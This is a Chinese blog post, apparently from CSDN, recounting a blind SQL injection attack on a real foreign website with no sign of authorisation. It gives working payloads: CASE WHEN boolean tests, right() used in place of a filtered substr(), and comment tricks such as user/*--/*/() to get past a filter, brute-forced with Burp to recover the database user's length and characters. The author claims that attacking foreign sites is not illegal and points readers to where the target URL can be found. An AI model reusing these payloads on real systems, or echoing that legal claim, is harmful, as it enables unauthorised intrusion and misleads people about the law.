渗透实战之对外国一网站进行的SQL盲注测试

最新推荐文章于 2023-07-13 16:32:50 发布
最新推荐文章于 2023-07-13 16:32:50 发布
阅读量440 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 web安全 数据库 渗透实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60716947/article/details/129551690
版权

起因:大早上体育课改成了线上,又正逢看到大佬发了一篇SQL注入文章,就想着复现一下,练练手,本篇就是记录一下渗透过程。

先判断闭合类型

1/1如下

 1/0如下

两次回显不一样,说明是数字型注入,尝试使用case when

https://ip/index.php?id=1/case+when+1=1+then+1+else+0+end&lang=sk

 

有回显,有搞头,到这里我和那位师傅的情况一样,但是下面他用了substr()这个函数,但是我用的时候已经被过滤了

 

尝试了很多绕过方法都不行,于是尝试用其他函数替代,发现有个right没有被过滤

 

 接下来盲注爆破user数据用户名

id=1/case+when+right(user(),1)!='1'+then+1+else+0+end

但是user()也被过滤,

user/**/()也不行,那就尝试在/**/加东西看看能不能绕过

/index.php?id=1/case+when+right(user/*§§*/(),1)!=%27a%27+then+1+else+0+end&lang=sk

 burp跑一下

 

发现很多绕过方法,随便选一个

 

成功绕过,那就随便爆破两位意思意思,点到为止

/index.php?id=1/case+when+right(user/*--/*/(),2)!=%27§a§0%27+then+1+else+0+end&lang=sk

 

最后一位为0 ,看一下倒数第二位

为8,其他就不测试了,其实length()函数也没有被过滤,看一下user多少位

id=1/case+when+length(user/*--/*/())=§1§+then+1+else+0+end

 

 为26位。

总结:一次不错的渗透测试,本来user()那里绕不过去都想放弃了,但还是坚持了下去,所以还是要多试试。

PS:本来这个码我懒得打的,毕竟按照其他师傅说的,国外的站嘛,随便日又不犯法,感兴趣的师傅可以去搜公众号湘安无事找url。hh其实有的师傅估计能从回显中看出来url,信息收集yyds。 

清丶酒孤欢ゞ
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 7301
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
Web应用手工渗透测试——用SQLMap进行SQL测试
02-26
本文将更进一步,讨论SQL,如果读者没有任何相关知识储备,建议先去wikipedia学习一下。在继续之前需要提醒一下,如果读者也想要按本文的步骤进行,需要在NOWASPMutillidae环境搭建好之后先册一个...
【网络安全知识体系】外网渗透测试 | 14个小实验
热门推荐
04-18 1万+
【通俗易懂】外网渗透测试的流程&14个小实验带你了解网络安全
SQLi Dumper v.8.0(国外SQL网站入工具)
10-18
网站渗透,爆数据库.Beyond SQLi: Obfuscate and Bypass |=--------------------------------------------------------------------=| |=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=| |=-------------------------=[ 6 October 2011 ]=-----------------------=| |=----------------------=[ By CWH Underground ]=--------------------=| |=--------------------------------------------------------------------=| ###### Info ###### Title : Beyond SQLi: Obfuscate and Bypass Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan" Team : CWH Underground [http://www.exploit-db.com/author/?a=1275]
渗透测试-信息收集(外网)的一些方法
weixin_54438700的博客
07-13 792
信息收集范围太广了。。。有太多太多的手段和方法,这里仅总结了以下一些手段,打着一边学习一边进步的想法,慢慢补充完善吧,持续更新。。。
实操:sql入国外xx网站
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
04-13 1万+
作者丨程橙橙来源丨孑蝉(jiechan-aci)前言:学了sql入一段时间了,也在顺利通关过墨者靶场。不过,靶场哪有真实网站好玩?何为sql入? sql入就是sq...
超牛叉的外网渗透详细教程
cheyunhua的博客
03-22 6144
文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器。 但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。 搜索结果的话, 首先,虚拟机里的kali不能渗透到外网的原因是它没有外网IP。 所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。 本质其实都一样。但是亲测后者比较有用。 可!是! 第二个方法有一个特点,就是很烦。 买好服务器之后再下载frp,服务器
31-31.渗透测试SQL
05-10
渗透测试SQL
35-35.渗透测试SQL入之SQL入防御
最新发布
05-10
35-35.渗透测试SQL入之SQL入防御
基于二阶分片重组渗透测试方法
01-14
针对如何克服当前SQL渗透测试存在的目性,以生成优化的SQL入攻击模式、增强渗透测试攻击生成阶段的有效性,提高对SQL渗透测试的准确度问题,提出一种基于二阶分片重组的SQL漏洞渗透测试方法。...
29-29.渗透测试SQL入基础(上)
05-10
渗透测试SQL入基础(上)
5个外国渗透测试技能学习网站
jehuyang的博客
05-20 1507
#1 – Hacking Tutorial: Tech Tips and Hacking Tricks Sometimes, perfect English isn’t everything.Hacking Tutorialis an example of when the writing skill of the author doesn’t necessarily equate to the quality of his or her technical knowledge. This is ac..
国外渗透测试社区网站推荐
jehuyang的博客
05-20 2519
网站列表 Cybrary – Free Cyber Security Training URL:http://www.cybrary.it Hak5 – New Hacks Every Week URL:https://hak5.org Tinkernut URL:http://www.tinkernut.com Cyberpunk URL:http://n0where.net Exploit Database URL:http://www.exploit-db.com Darknet...
case when用法_CASE … WHEN和cast类型转换(日志案例分析应用)
weixin_39589394的博客
11-26 607
先补充两个知识点:CASE … WHEN和CAST类型转换CASE … WHEN…的用法创建数据库创建员工表create table emp(empno int comment '员工编号',ename string comment '员工姓名',job string comment '员工职位',mgr int comment '领导编号',hiredate string comment '入职...
SQL中Case的使用方法(下篇)
weixin_30399821的博客
07-20 93
接上篇 四,根据条件有选择的UPDATE。 例,有如下更新条件 工资5000以上的职员,工资减少10% 工资在2000到4600之间的职员,工资增加15% 很容易考虑的是选择执行两次UPDATE语句,如下所示 --条件1 UPDATE Personnel SET salary = salary * 0.9 WHERE salary >= 5000; ...
学习web渗透测试国内、国外在线网站
公众号:乌云安全
08-20 6283
本文首发于公众号:乌云安全,提供关于渗透测试、社会工程学、黑产的技术及资讯。 国内 1、i春秋 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际环境的实验平台。 地址:http://www.ichunqiu.com/main 2、freebuf FreeBuf黑客与极客,国内关度最高的全球互联网安全媒体平台,同时也是爱好者们交流与分...
渗透测试 在线资源】
weixin_30919429的博客
07-06 477
在线资源 渗透测试资源 Metasploit Unleashed- 免费的metasploit教程 PTES- 渗透测试执行标准 OWASP- 开放式Web应用程序安全项目 OSSTMM- 开源安全测试方法手册 Shell 脚本资源 LSST- linux shell脚本教程 Linux 资源 Kernel...
国外黑客们的入侵网站思路
kuxing100的专栏
03-28 4673
问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的! 让我们来看看目标站点:hack-test.com 先ping下站点所在服务器的IP: 现在我们有了目标站点所在服务器的IP了 — 173.236.138.113 然后我们可以找找同个IP上的其他站点(旁站:samei
国外整理的一套在线渗透测试资源合集
iiiiiiiiiiii9的专栏
01-15 3161
http://bobao.360.cn/news/detail/1132.html http://www.txahz.com/article-14108-1.html 国内外盛传的几款Web漏洞扫描器 企业Web安全漏洞扫描 现在web安全企业是越来越重视,比如在日常生产中都会用到一些漏洞扫描工具来代替繁琐的手工查找,而且高效使用,下面小编介绍几款国内
CTF中几种通用的sql手法和入的一些tips1
08-03
在CTF(Capture The Flag)网络安全竞赛中,SQL是一种常见的攻击手段,特别是在面对具有严格过滤规则的Web应用程序时。以下是一些通用的SQL手法: 1. XOR入: XOR入利用了SQL中的异或操作符`^`来判断...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

清丶酒孤欢ゞ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值